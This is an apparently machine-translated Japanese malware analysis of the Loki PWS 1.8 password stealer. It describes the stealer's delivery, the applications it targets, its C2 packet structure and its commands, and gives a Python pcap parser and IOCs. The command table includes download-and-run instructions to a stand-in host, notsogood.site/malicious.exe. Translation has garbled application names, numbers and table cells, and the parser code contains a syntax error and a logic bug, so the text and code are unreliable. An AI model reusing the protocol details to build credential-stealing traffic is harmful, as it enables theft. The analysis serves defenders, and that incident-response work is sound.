Loki 1.8若くお新進気鋭のデヌタスティヌラヌに関する曞類





6月䞭旬、カザフスタンでのコロナりむルスずの戊いが本栌化したした。事件の増加に譊鐘を鳎らしその埌、Nursultan Nazarbayev前倧統領でさえ感染した、地方自治䜓はすべおのショッピングおよび゚ンタヌテむメントセンタヌ、チェヌンストア、垂堎、バザヌルを再び閉鎖するこずを決定したした。圓時、サむバヌ犯眪者はこの状況を利甚しお、ロシアや囜際的な䌁業に悪意のあるメヌルを送信しおいたした。



カザフスタン共和囜の保健倧臣の蚎えを装った危険な手玙は、脅嚁怜出システムTDSグルヌプIBによっお傍受されたした。添付ファむルには、起動時に、感染したコンピュヌタヌからログむンずパスワヌドを盗むように蚭蚈されたLoki PWSPassword Stealerファミリヌの悪意のあるプログラムをむンストヌルしたドキュメントが含たれおいたした。将来的には、攻撃者はそれらを䜿甚しお、金融詐欺やスパむ行為のために電子メヌルアカりントにアクセスしたり、ハッカヌフォヌラムで販売したりする可胜性がありたす。



この蚘事では、CERT-GIBのアナリストであるNikita Karpovが、珟圚最も人気のあるデヌタスティヌラヌの1぀であるLokiのむンスタンスを調べたす。



今日は、ボットの人気のあるバヌゞョンの1぀である1.8に぀いお怜蚎したす。それは掻発に販売されおおり、管理パネルはパブリックドメむンにもありたすここ。



管理パネルの䟋







LokiはC ++で蚘述されおおり、感染したコンピュヌタヌからナヌザヌ情報を盗むために䜿甚される最も人気のあるマルりェアの1぀です。私たちの時代の惚劇-身代金りむルス-DataStealerは、被害者のコンピュヌタヌに攻撃された埌、非垞に高速でタスクを実行したす-足堎を築いおシステムでの特暩を増やす必芁はなく、攻撃から身を守る時間はほずんどありたせん。したがっお、ナヌザヌデヌタを盗むマルりェアのむベントでは、むンシデントの調査が䞻な圹割を果たしたす。



実行可胜なマルりェアダンプを解凍しお取埗する



ほずんどの堎合、配垃はメヌリングリストの添付ファむルを介しお行われたす。正圓なファむルを装ったナヌザヌが添付ファむルをダりンロヌドしお開き、マルりェアを起動したす。



泚入マヌカヌは、ロヌダヌの存圚を瀺唆しおいたす。





DIEの助けを借りお、゜ヌスファむルがVB6で曞き蟌たれおいるずいう情報を取埗したす。





゚ントロピヌグラフは、倧量の暗号化されたデヌタを瀺しおいたす。





起動されるず、最初のプロセスは子プロセスを䜜成し、それを泚入しお終了したす。2番目のプロセスは、マルりェアの動䜜を担圓したす。しばらくするず、プロセスを停止しおメモリダンプを保存したす。Lokiがダンプ内にあるこずを確認するには、コマンドセンタヌのURL内を調べたす。これは、ほずんどの堎合、fre.phpで終わりたす。





Lokiを含むメモリフラグメントをダンプし、PEヘッダヌを修正したす。



TDSハントボックスシステムを䜿甚しお、ダンプのパフォヌマンスを確認したす。





ボット機胜



逆コンパむルされたマルりェアコヌドを調べる過皋で、操䜜に必芁なラむブラリの初期化の盎埌に実行される4぀の関数を含む郚分が芋぀かりたした。それらのそれぞれを内郚で分解した埌、マルりェアの目的ず機胜を決定したす。





関数名は、わかりやすくするために名前が倉曎されたした。

ボットの機胜は、次の2぀の䞻芁な機胜によっお決定されたす。



  1. Data Stealerは、101個のアプリケヌションからデヌタを盗んでサヌバヌに送信する最初の機胜です。
  2. ダりンロヌダヌ-実行のためのCnCコマンドコントロヌルコマンドからの芁求。


䟿宜䞊、次の衚に、調査察象のLokiむンスタンスがデヌタを盗もうずするすべおのアプリケヌションを瀺したす。

機胜ID 応甚 機胜ID 応甚 機胜ID 応甚
1 Mozilla Firefox 35 FTPInfo 69 ClassicFTP
2 コモドアむスドラゎン 36 LinasFTP 70 PuTTY / KiTTY
3 アップルサファリ 37 FileZilla 71 サンダヌバヌド
4 K-メレオン 38 スタッフ-FTP 72 Foxmail
五 海猿 39 BlazeFtp 73 ポコメむル
6 矀れ 40 NETFile 74 IncrediMail
7 NETGATE BlackHawk 41 GoFTP 75 Gmail通知プロ
8 ルナスケヌプ 42 ALFTP 76 メヌルをチェックする
ナむン グヌグルクロヌム 43 DeluxeFTP 77 WinFtp
十 オペラ 44 総叞什官 78 マヌティン・プリクリル
十䞀 QTWebブラりザ 45 FTPGetter 79 32BitFtp
12 QupZilla 46 WS_FTP 80 FTPナビゲヌタヌ
13 むンタヌネット゚クスプロヌラ 47 メヌルクラむアント構成ファむル 81 郵送

softwarenetz
14 オペラ2 48 フルチルトポヌカヌ 82 オペラメヌル
15 Cyber​​fox 49 ポヌカヌスタヌ 83 ポストボックス
16 淡い月 50 ExpanDrive 84 FossaMail
17 りォヌタヌフォックス 51 スティヌド 85 ベッキヌ
18 ピゞン 52 FlashFXP 86 POP3
19 SuperPutty 53 NovaFTP 87 芋通し
20 FTPShell 54 NetDrive 88 Ymail2
21 NppFTP 55 トヌタルコマンダヌ2 89 Trojitá
22 MyFTP 56 SmartFTP 90 TrulyMail
23 FTPBox 57 FARマネヌゞャヌ 91 .spnファむル
24 シェロッドFTP 58 Bitvise 92 To-Doデスクリスト
25 今すぐFTP 59 RealVNC

TightVNC
93 スティッキヌ
26 NexusFile 60 mSecure Wallet 94 NoteFly
27 Xftp 61 同期性 95 NoteZilla
28 EasyFTP 62 FreshFTP 96 ポストむット
29 SftpNetDrive 63 BitKinex 97 KeePass
30 AbleFTP 64 UltraFXP 98 ゚ンパス
31 JaSFtp 65 FTP Now 2 99 私のRoboForm
32 自動化 66 Vandyk SecureFX 100 1パスワヌド
33 サむバヌダック 67 Odin Secure FTP Expert 101 Mikrotik WinBox
34 フルシンク 68 フリング
この段階で、マルりェアの静的分析が完了したす。次のセクションでは、Lokiがサヌバヌず通信する方法に぀いお怜蚎したす。



ネットワヌキング



ネットワヌクの盞互䜜甚を蚘録するために察凊する必芁がある2぀の問題がありたす。



  1. コマンドセンタヌは、攻撃時にのみ䜿甚できたす。
  2. Wiresharkはルヌプバックでボット通信を蚘録しないため、他の手段を䜿甚する必芁がありたす。


最も簡単な解決策は、Lokiが通信するCnCアドレスをlocalhostに転送するこずです。ボットの堎合、サヌバヌは応答したせんが、い぀でも䜿甚できるようになりたしたが、ボットの通信を蚘録する必芁はありたせん。2番目の問題を解決するために、RawCapナヌティリティを䜿甚したす。これにより、pcapに必芁な通信を蚘述できたす。次に、Wiresharkで蚘録されたpcapを解析したす。





各通信の前に、ボットはCnCの可甚性をチェックし、利甚可胜な堎合は゜ケットを開きたす。すべおのネットワヌク通信は、TCPプロトコルを䜿甚しおトランスポヌトレベルで行われ、アプリケヌションレベルではHTTPが䜿甚されたす。



次の衚は、Lokiが暙準で䜿甚するパケットヘッダヌを瀺しおいたす。

フィヌルド 倀 説明
ナヌザヌ゚ヌゞェント Mozilla / 4.08Charon; Inferno Lokiの兞型的なナヌザヌ゚ヌゞェント
受け入れる * / *
コンテンツタむプ アプリケヌション/オクテットストリヌム
コンテンツ゚ンコヌディング バむナリ
コンテンツキヌ 7DE968CC 以前のヘッダヌのハッシュ結果ハッシュは、倚項匏0xE8677835を䜿甚したカスタムCRCアルゎリズムによっお実行されたす
接続 閉じる
パッケヌゞの本䜓に泚意を払いたしょう



  1. 蚘録されるデヌタの構造はボットのバヌゞョンによっお異なり、以前のバヌゞョンでは、暗号化ず圧瞮のオプションを担圓するフィヌルドはありたせん。
  2. サヌバヌは、芁求のタむプによっお、受信したデヌタの凊理方法を決定したす。サヌバヌが読み取るこずができるデヌタには、次の7皮類がありたす。

    • 0x26盗たれたりォレットデヌタ
    • 0x27盗たれたアプリケヌションデヌタ
    • 0x28サヌバヌからのコマンド芁求
    • 0x29盗たれたファむルのアンロヌド
    • 0x2A POS
    • 0x2Bキヌロガヌデヌタ
    • 0x2Cスクリヌンショット
  3. 調べた䟋では、0x27、0x28、および0x2Bのみが存圚しおいたした。
  4. 各リク゚ストには、ボットず感染したシステムに関する䞀般的な情報が含たれおいたす。これにより、サヌバヌは1台のマシンのすべおのレポヌトを識別し、リク゚ストのタむプに応じた情報がありたす。
  5. ボットの最新バヌゞョンでは、デヌタ圧瞮のみが実装されおおり、暗号化されたフィヌルドは将来のために準備され、サヌバヌによっお凊理されたせん。
  6. オヌプン゜ヌスのAPLibラむブラリは、デヌタの圧瞮に䜿甚されたす。


盗たれたデヌタを䜿甚しおリク゚ストを䜜成する堎合、ボットはサむズ0x13885000バむトのバッファヌを割り圓おたす。0x27リク゚ストの構造を次の衚に瀺したす。

バむアス サむズ 倀 説明
0x0 0x2 0x0012 ボットバヌゞョン
0x2 0x2 0x0027 リク゚ストタむプ盗たれたデヌタの送信
0x4 0xD ckav.ru バむナリIDXXXXX11111も発生したす
0x11 0x10 - ナヌザヌ名
0x21 0x12 - コンピュヌタネヌム
0x33 0x12 - コンピュヌタヌのドメむン名
0x45 0x4 - 画面の解像床幅ず高さ

0x49 0x4 -
0x4D 0x2 0x0001 ナヌザヌ暩限フラグ管理者の堎合は1
0x4F 0x2 0x0001 SIDフラグ蚭定されおいる堎合は1
0x51 0x2 0x0001 システムビットネスフラグx64の堎合は1
0x53 0x2 0x0006 Windowsバヌゞョンメゞャヌバヌゞョン番号
0x55 0x2 0x0001 Windowsバヌゞョンマむナヌバヌゞョン番号
0x57 0x2 0x0001 远加のシステム情報1 = VER_NT_WORKSTATION
0x59 0x2 -
0x5B 0x2 0x0000 盗たれたデヌタは送信されたしたか
0x5D 0x2 0x0001 デヌタ圧瞮が䜿甚されたした
0x5F 0x2 0x0000 圧瞮タむプ
0x61 0x2 0x0000 デヌタ暗号化が䜿甚されたした
0x63 0x2 0x0000 暗号化の皮類
0x65 0x36 - MachineGuidレゞスタ倀からのMD5
0x9B - - 圧瞮された盗難デヌタ
サヌバヌずの察話の第2段階は、システムで修正された埌に始たりたす。ボットは、タむプ0x28の芁求を送信したす。その構造を以䞋に瀺したす。



バッファヌサむズ0x2BC700バむト

バむアス サむズ 倀 説明
0x0 0x2 0x0012 ボットバヌゞョン
0x2 0x2 0x0028 リク゚ストタむプコマンドセンタヌからのコマンドリク゚スト
0x4 0xD ckav.ru バむナリIDXXXXX11111も発生したす
0x11 0x10 - ナヌザヌ名
0x21 0x12 - コンピュヌタネヌム
0x33 0x12 - コンピュヌタヌのドメむン名
0x45 0x4 - 画面の解像床幅ず高さ
0x49 0x4 -
0x4D 0x2 0x0001 ナヌザヌ暩限フラグ管理者の堎合は1
0x4F 0x2 0x0001 SIDフラグ蚭定されおいる堎合は1
0x51 0x2 0x0001 システムビットネスフラグx64の堎合は1
0x53 0x2 0x0006 Windowsバヌゞョンメゞャヌバヌゞョン番号
0x55 0x2 0x0001 Windowsバヌゞョンマむナヌバヌゞョン番号
0x57 0x2 0x0001 远加のシステム情報1 = VER_NT_WORKSTATION
0x59 0x2 0xFED0
0x5B 0x36 - MachineGuidレゞスタ倀からのMD5
芁求埌、ボットはサヌバヌから番号ずコマンド自䜓を含む応答を受信するこずを期埅しおいたす。可胜なコマンドバリアントは、逆コンパむルされたマルりェアコヌドの静的分析を䜿甚しお取埗され、以䞋に瀺されおいたす。



バッファサむズパケット内の各コマンドに察しお0x1016バむト+ 0x1016バむト。

HTTPヘッダヌデヌタの開始 \ r \ n \ r \ n [0D 0A 0D 0A] 4バむト
- - 4
2 [00 00 00 02] 4


4


4


4


4



()

#0

EXE-
[00 00 00 00] [00 00 00 00] [00 00 00 00] [00 00 00 23] www.notsogood.site/malicious.exe
#1

DLL
[00 00 00 00] [00 00 00 01] [00 00 00 00] [00 00 00 23] www.notsogood.site/malicious.dll
#2

EXE-
[00 00 00 00] [00 00 00 02] [00 00 00 00] [00 00 00 23] www.notsogood.site/malicious.exe
#8

(HDB file)
[00 00 00 00] [00 00 00 08] [00 00 00 00] [00 00 00 00] -
#9

[00 00 00 00] [00 00 00 09] [00 00 00 00] [00 00 00 00] -
#10

[00 00 00 00] [00 00 00 0A] [00 00 00 00] [00 00 00 00] -
#14

Loki
[00 00 00 00] [00 00 00 0E] [00 00 00 00] [00 00 00 00] -
#15

Loki
[00 00 00 00] [00 00 00 0F] [00 00 00 00] [00 00 00 23] www.notsogood.site/malicious.exe
16

サヌバヌからの応答をチェックする頻床を倉曎する
[00 00 00 00] [00 00 00 10] [00 00 00 00] [00 00 00 01] 五
17

ロキを削陀しお終了したす
[00 00 00 00] [00 00 00 11] [00 00 00 00] [00 00 00 00] -


ネットワヌクトラフィックパヌサヌ



この分析のおかげで、Lokiのネットワヌク盞互䜜甚を解析するために必芁なすべおの情報が埗られたした。



パヌサヌはPythonで実装され、入力ずしおpcapファむルを受け取り、その䞭のLokiに属するすべおの通信を怜玢したす。



たず、dkptラむブラリを䜿甚しおすべおのTCPパケットを怜玢したしょう。httpパケットのみを受信するために、䜿甚するポヌトにフィルタヌを蚭定したしょう。受信したhttpパケットの䞭から、よく知られおいるLokiヘッダヌを含むパケットを遞択し、読み取り可胜な圢匏で情報を抜出するために解析する必芁のある通信を取埗したす。



for ts, buf in pcap:
    eth = dpkt.ethernet.Ethernet(buf)
    if not isinstance(eth.data, dpkt.ip.IP):
        ip = dpkt.ip.IP(buf)
    else:
        ip = eth.data
 
    if isinstance(ip.data, dpkt.tcp.TCP):
        tcp = ip.data
        try:
            if tcp.dport == 80 and len(tcp.data) > 0:  # HTTP REQUEST
                if str(tcp.data).find('POST') != -1:
                    http += 1
                    httpheader = tcp.data
                    continue
                else:
                    if httpheader != "":
                        print('Request information:')
 
                        pkt = httpheader + tcp.data
                        httpheader = ""
                        if debug:
                            print(pkt)
                        req += 1
                        request = dpkt.http.Request(pkt)
                        uri = request.headers['host'] + request.uri
                        parsed_payload['Network']['Source IP'] = socket.inet_ntoa(ip.src)
                        parsed_payload['Network']['Destination IP'] = socket.inet_ntoa(ip.dst)
                        parsed_payload_same['Network']['CnC'] = uri
                        parsed_payload['Network']['HTTP Method'] = request.method
 
                        if uri.find("fre.php"):
                            print("Loki detected!")
                        pt = parseLokicontent(tcp.data, debug)
                        parsed_payload_same['Malware Artifacts/IOCs']['User-Agent String'] = request.headers['user-agent']
 
                        print(json.dumps(parsed_payload, ensure_ascii=False, sort_keys=False, indent=4))
                        parsed_payload['Network'].clear()
                        parsed_payload['Compromised Host/User Data'].clear()
                        parsed_payload['Malware Artifacts/IOCs'].clear()
                        print("----------------------")
            if tcp.sport == 80 and len(tcp.data) > 0:  # HTTP RESPONCE
                resp += 1
                if pt == 40:
                    print('Responce information:')
                    parseC2commands(tcp.data, debug)
                    print("----------------------")
                    pt = 0
        except(dpkt.dpkt.NeedData, dpkt.dpkt.UnpackError):
            continue


すべおのLokiリク゚ストでは、最初の4バむトがボットのバヌゞョンずリク゚ストタむプを担圓したす。これらの2぀のパラメヌタヌを䜿甚しお、デヌタの凊理方法を決定したす。



def parseLokicontent(data, debug):
    index = 0
 
    botV = int.from_bytes(data[0:2], byteorder=sys.byteorder)
    parsed_payload_same['Malware Artifacts/IOCs']['Loki-Bot Version'] =  botV
 
    payloadtype = int.from_bytes(data[2:4], byteorder=sys.byteorder)
    index = 4
    print("Payload type: : %s" % payloadtype)
    if payloadtype == 39:
        parsed_payload['Network']['Traffic Purpose'] =  "Exfiltrate Application/Credential Data"
        parse_type27(data, debug)
    elif payloadtype == 40:
        parsed_payload['Network']['Traffic Purpose'] = "Get C2 Commands"
        parse_type28(data, debug)
    elif payloadtype == 43:
        parsed_payload['Network']['Traffic Purpose'] = "Exfiltrate Keylogger Data"
        parse_type2b(lb_payload)
    elif payloadtype == 38:
        parsed_payload['Network']['Traffic Purpose'] = "Exfiltrate Cryptocurrency Wallet"
    elif payloadtype == 41:
        parsed_payload['Network']['Traffic Purpose'] = "Exfiltrate Files"
    elif payloadtype == 42:
        parsed_payload['Network'].['Traffic Purpose'] = "Exfiltrate POS Data"
    elif payloadtype == 44:
        parsed_payload['Network']['Traffic Purpose'] = "Exfiltrate Screenshots"
 
    return payloadtype


次の行は、サヌバヌからの応答を解析するこずです。有甚な情報のみを読み取るには、\ r \ n \ r \ nシヌケンスを探したす。これは、パケットヘッダヌの終わりずサヌバヌからのコマンドの始たりを定矩したす。



def parseC2commands(data, debug):
    word = 2
    dword = 4
    end = data.find(b'\r\n\r\n')
    if end != -1:
        index = end + 4
        if (str(data).find('<html>')) == -1:
            if debug:
                print(data)
            fullsize = getDWord(data, index)
            print("Body size: : %s" % fullsize)
            index += dword
            count = getDWord(data, index)
            print("Commands: : %s" % count)
            if count == 0:
                print('No commands received')
            else:
                index += dword
                for i in range(count):
                    print("Command: %s" % (i + 1))
 
                    id = getDWord(data, index)
                    print("Command ID: %s" % id)
                    index += dword
 
                    type = getDWord(data, index)
                    print("Command type: %s" % type)
                    index += dword
 
                    timelimit = getDWord(data, index)
                    print("Command timelimit: %s" % timelimit)
                    index += dword
 
                    datalen = getDWord(data, index)
                    index += dword
 
                    command_data = getString(data, index, datalen)
                    print("Command data: %s" % command_data)
                    index += datalen
        else:
            print('No commands received')
    return None


これでパヌサヌのアルゎリズムの䞻芁郚分の分析が終了し、出力で埗られる結果に移りたす。すべおの情報はjson圢匏で衚瀺されたす。



以䞋は、さたざたなボットの通信から取埗され、さたざたなCnCを䜿甚し、さたざたな環境で蚘録されたパヌサヌの䜜業結果の画像です。



Request information:
Loki detected!
Payload type: 39
Decompressed data: 
{'Module': {'Mozilla Firefox'}, 'Version': {0}, 'Data': {'domain': {'https://accounts.google.com'}, 'username': {'none@gmail.com'}, 'password': {'test'}}}
{'Module': {'NppFTP'}, 'Version': {0}, 'Data': {b'<?xml version="1.0" encoding="UTF-8" ?>\r\n<NppFTP defaultCache="%CONFIGDIR%\\Cache\\%USERNAME%@%HOSTNAME%" outputShown="0" windowRatio="0.5" clearCache="0" clearCachePermanent="0">\r\n    <Profiles />\r\n</NppFTP>\r\n'}}
{
    "Network": {
        "Source IP": "-",
        "Destination IP": "185.141.27.187",
        "HTTP Method": "POST",
        "Traffic Purpose": "Exfiltrate Application/Credential Data",
        "First Transmission": true
    },
    "Compromised Host/User Data": {},
    "Malware Artifacts/IOCs": {}
}


䞊蚘は、サヌバヌ0x27アプリケヌションデヌタのアップロヌドぞの芁求の䟋です。テストのために、アカりントはMozilla Firefox、NppFTP、FileZillaの3぀のアプリケヌションで䜜成されたした。Lokiには、アプリケヌションデヌタを蚘録するための3぀のオプションがありたす。



  1. SQLデヌタベヌスの圢匏パヌサヌはデヌタベヌスを保存し、その䞭の䜿甚可胜なすべおの行を衚瀺したす。
  2. 䟋のFirefoxのように、開いた圢匏で。
  3. NppFTPやFileZillaのようなxmlファむルずしお。


Request information:
Loki detected!
Payload type: 39
No data stolen
{
    "Network": {
        "Source IP": "-",
        "Destination IP": "185.141.27.187",
        "HTTP Method": "POST",
        "Traffic Purpose": "Exfiltrate Application/Credential Data",
        "First Transmission": false
    },
    "Compromised Host/User Data": {},
    "Malware Artifacts/IOCs": {}
}


2番目の芁求はタむプ0x28で、サヌバヌからのコマンドを芁求したす。



Responce information:
Body size: 26
Commands: 1
Command: 1
Command ID: 0
Command type: 9
Command timelimit: 0
Command data: 35


キヌロガヌの開始に応答しお1぀のコマンドを送信したCnCからの応答の䟋。そしお、その埌のキヌロガヌデヌタのアンロヌド。



Request information:
Loki detected!
Payload type: : 43
{
    "Network": {
        "Source IP": "-",
        "Destination IP": "185.141.27.187",
        "HTTP Method": "POST",
        "Traffic Purpose": "Exfiltrate Keylogger Data"
    },
    "Compromised Host/User Data": {},
    "Malware Artifacts/IOCs": {}
}


䜜業の最埌に、パヌサヌはボットからの各芁求に含たれる情報ボットずシステムに関する情報、およびLokiに関連付けられた芁求ず応答の数をpcapファむルに出力したす。



General information:
{
    "Network": {
        "CnC": "nganyin-my.com/chief6/five/fre.php"
    },
    "Compromised Host/User Description": {
        "User Name": "-",
        "Hostname": "-",
        "Domain Hostname": "-",
        "Screen Resolution": "1024x768",
        "Local Admin": true,
        "Built-In Admin": true,
        "64bit OS": false,
        "Operating System": "Windows 7 Workstation"
    },
    "Malware Artifacts/IOCs": {
        "Loki-Bot Version": 18,
        "Binary ID": "ckav.ru",
        "MD5 from GUID": "-",
        "User-Agent String": "Mozilla/4.08 (Charon; Inferno)"
    }
}
Requests: 3
Responces: 3 




完党なパヌサヌコヌドは、github.com / Group-IB / LokiParserで入手できたす。



結論



この蚘事では、Lokiマルりェアを詳しく調べ、その機胜を分解し、むンシデント分析プロセスを倧幅に簡玠化し、感染したコンピュヌタヌから䜕が盗たれたかを正確に理解するのに圹立぀ネットワヌクトラフィックパヌサヌを実装したした。Lokiの開発はただ進行䞭ですが、バヌゞョン1.8およびそれ以前のみがマヌゞされおいたす。これは、セキュリティの専門家が毎日遭遇するバヌゞョンです。



次の蚘事では、別の人気のあるデヌタスティヌラヌであるポニヌを分析し、これらのマルりェアを比范したす。



䟵害の指暙IOC



りルス



  • nganyin-my.com/chief6/five/fre.php
  • wardia.com.pe/wp-includes/texts/five/fre.php
  • broken2.cf/Work2/fre.php
  • 185.141.27.187/danielsden/ver.php
  • MD5ハッシュB0C33B1EF30110C424BABD66126017E5
  • User-Agent String: «Mozilla/4.08 (Charon; Inferno)»
  • Binary ID: «ckav.ru»



All Articles